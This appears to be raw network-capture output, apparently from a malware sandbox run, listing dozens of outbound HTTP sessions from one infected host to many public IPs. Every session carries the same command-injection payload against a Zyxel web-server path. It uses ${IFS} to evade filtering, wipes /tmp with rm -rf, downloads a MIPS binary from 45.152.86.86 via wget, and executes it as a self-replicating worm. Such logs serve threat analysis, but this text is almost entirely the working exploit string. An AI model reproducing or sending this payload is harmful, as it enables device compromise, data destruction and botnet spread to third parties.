                              Mar 31, 2024 08:41:41.011377096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5881192.168.2.1355640190.33.176.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011409044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5882192.168.2.1359588163.53.176.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011468887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5883192.168.2.134497859.3.195.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011492014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5884192.168.2.1347276118.41.17.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011549950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5885192.168.2.1335122159.66.67.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011584997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5886192.168.2.1342076209.153.152.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011624098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5887192.168.2.135343861.80.77.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011667013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5888192.168.2.134962449.135.69.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011698961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5889192.168.2.133699076.75.155.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011738062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5890192.168.2.1354878168.195.12.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011797905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5891192.168.2.1360602166.129.83.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011842966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5892192.168.2.1350526172.32.20.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011892080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5893192.168.2.135875682.64.247.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011914968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5894192.168.2.1351078173.23.88.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.011944056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5895192.168.2.1344158183.33.39.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012008905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5896192.168.2.134814245.102.77.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012025118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5897192.168.2.133511236.149.6.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012064934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5898192.168.2.1346634163.195.132.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012119055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5899192.168.2.1333114223.237.22.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012162924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5900192.168.2.134767012.42.150.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012192965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5901192.168.2.1342848129.73.177.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012233973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5902192.168.2.1340428144.74.6.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012288094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5903192.168.2.134060219.77.165.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012345076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5904192.168.2.134422223.247.98.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012375116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5905192.168.2.1344030197.101.130.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012425900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5906192.168.2.135209096.242.219.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012427092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5907192.168.2.134501884.96.163.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012469053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5908192.168.2.1358630218.54.149.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012531996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5909192.168.2.1354586121.101.136.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012563944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5910192.168.2.1340096222.185.29.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012609005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5911192.168.2.1349078122.112.26.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012650013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5912192.168.2.133368020.85.39.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012680054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5913192.168.2.134842618.105.124.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012706995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5914192.168.2.135395691.172.126.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012747049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5915192.168.2.135326465.24.71.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012809038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5916192.168.2.135669863.237.118.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012846947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5917192.168.2.1352998114.131.218.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012898922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5918192.168.2.1356880201.87.125.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012940884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5919192.168.2.1360726165.180.209.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.012974024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5920192.168.2.135837048.156.212.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013019085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5921192.168.2.1346658138.25.61.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013045073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5922192.168.2.1353466128.213.40.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013106108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5923192.168.2.133895470.232.233.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013127089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5924192.168.2.1351416182.163.173.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013149977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5925192.168.2.1334518190.162.46.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013212919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5926192.168.2.1333196155.228.151.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013242960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5927192.168.2.1338204207.239.112.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013268948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5928192.168.2.1358454170.233.187.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013300896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5929192.168.2.1359474207.43.26.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013345957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5930192.168.2.13497864.235.252.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013420105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5931192.168.2.135041240.153.92.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013458014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5932192.168.2.1353572211.80.187.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013520002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5933192.168.2.1357508132.241.62.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013550043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5934192.168.2.1353504209.166.126.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013581991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5935192.168.2.1346822157.167.108.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013613939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5936192.168.2.1356134159.187.198.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013642073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5937192.168.2.1340154128.24.64.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013689995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5938192.168.2.135997472.252.106.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013741970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5939192.168.2.134814860.20.210.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013770103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5940192.168.2.134944494.187.60.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013806105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5941192.168.2.1354926105.191.8.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013859987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5942192.168.2.134958682.109.119.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013875008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5943192.168.2.1355614170.239.126.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013909101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5944192.168.2.1337938171.88.41.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013950109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5945192.168.2.1352532220.78.17.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.013967037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5946192.168.2.1346294145.213.30.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014014959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5947192.168.2.1349768191.113.186.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014067888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5948192.168.2.1352246173.8.219.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014118910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5949192.168.2.135783425.113.123.255443
                              TimestampBytes transferredDirectionData
